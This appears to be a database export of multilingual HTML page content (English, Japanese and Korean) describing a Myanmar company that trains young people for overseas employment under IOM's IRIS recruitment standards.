('page', 0, 26, 169, 'en', 0, '<p>Our company is established with the aim of creating a company that meets the international standards of ASEAN standards, providing training and employment opportunities to the future youth who want to work abroad according to the current conditions and needs of Myanmar.&nbsp;</p><p>In order to ensure that there is no harm between employers and employees, we are trying to select and produce workers in accordance with the standards of the International Recruitment Integrity System (IRIS) established by the International Organization for Migration (IOM).&nbsp;</p><p>The aim is to train the best local human resources and develop overseas employment opportunities as an International quality company.</p>', '', 'full_html'),
('page', 0, 26, 169, 'ja', 0, '<p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\"><strong><u>会社の目標</u></strong></span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\">我々はミャンマーの現状を見抜き、海外で働きたい生徒達の訓練、能力の高い生徒達を生み出し、アジアのスタンダード、国際スタンダードに負けない会社になることに目指しております。</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">会社と労働者の間に損失がないように</span>International Organization for Migration (IOM)<span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">が定めた</span>International Recruitment Integrity System(IRIS)<span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">に合った基準で管理しております。</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\">能力の高い生徒達を生み出し、国際スタンダードに負けない会社を運営して参ります。</span><o:p></o:p></p>', '', 'full_html'),
('page', 0, 26, 169, 'ko', 0, '<p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>회사의</strong></span><span style=\"font-size:14.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>미래</strong></span><span style=\"font-size:14.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>비전</strong></span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">우리</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">회사는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위대한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">미얀마의</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">현재</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">상황과</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">필요에</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">따라 외국에서</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일하고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">싶은</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">미래의</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">청년들에게</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">훈련과</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">취업</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기회를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공하고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"mso-fareast-language:KO;\">ASEAN&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">표준</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">,</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">국제</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기준에</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">부합하는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기업을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">만들기</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위해</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">설립되었습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">고용주와</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">근로자</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사이에</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">피해가</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">없도록</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">국제이주기구</span><span style=\"mso-fareast-language:KO;\">(IOM)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">에서</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제정한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">국제채용청렴제도</span><span style=\"mso-fareast-language:KO;\">(IRIS)&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기준에</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">따라</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">근로자를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">선발하고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">생산하도록</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">노력하고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">목표는 최고의</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">인재를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">양성하고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">국제 푶준 회사로서</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">해외</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">취업</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기회를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">발굴하는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">것입니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">.</span><o:p></o:p></p>', '', 'full_html'),
('page', 0, 26, 174, 'en', 0, '<p>Our company is established with the aim of creating a company that meets the international standards of ASEAN standards, providing training and employment opportunities to the future youth who want to work abroad according to the current conditions and needs of Myanmar.&nbsp;</p><p>In order to ensure that there is no harm between employers and employees, we are trying to select and produce workers in accordance with the standards of the International Recruitment Integrity System (IRIS) established by the International Organization for Migration (IOM).&nbsp;</p>', '', 'full_html'),
('page', 0, 26, 174, 'ja', 0, '<p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\"><strong><u>会社の目標</u></strong></span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\">我々はミャンマーの現状を見抜き、海外で働きたい生徒達の訓練、能力の高い生徒達を生み出し、アジアのスタンダード、国際スタンダードに負けない会社になることに目指しております。</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">会社と労働者の間に損失がないように</span>International Organization for Migration (IOM)<span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">が定めた</span>International Recruitment Integrity System(IRIS)<span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">に合った基準で管理しております。</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\">能力の高い生徒達を生み出し、国際スタンダードに負けない会社を運営して参ります。</span><o:p></o:p></p>', '', 'full_html'),
('page', 0, 26, 174, 'ko', 0, '<p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>회사의</strong></span><span style=\"font-size:14.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>미래</strong></span><span style=\"font-size:14.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>비전</strong></span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">우리</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">회사는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위대한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">미얀마의</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">현재</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">상황과</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">필요에</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">따라 외국에서</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일하고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">싶은</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">미래의</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">청년들에게</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">훈련과</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">취업</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기회를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공하고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"mso-fareast-language:KO;\">ASEAN&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">표준</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">,</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">국제</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기준에</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">부합하는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기업을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">만들기</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위해</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">설립되었습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">고용주와</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">근로자</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사이에</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">피해가</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">없도록</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">국제이주기구</span><span style=\"mso-fareast-language:KO;\">(IOM)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">에서</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제정한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">국제채용청렴제도</span><span style=\"mso-fareast-language:KO;\">(IRIS)&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기준에</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">따라</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">근로자를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">선발하고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">생산하도록</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">노력하고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">목표는 최고의</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">인재를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun 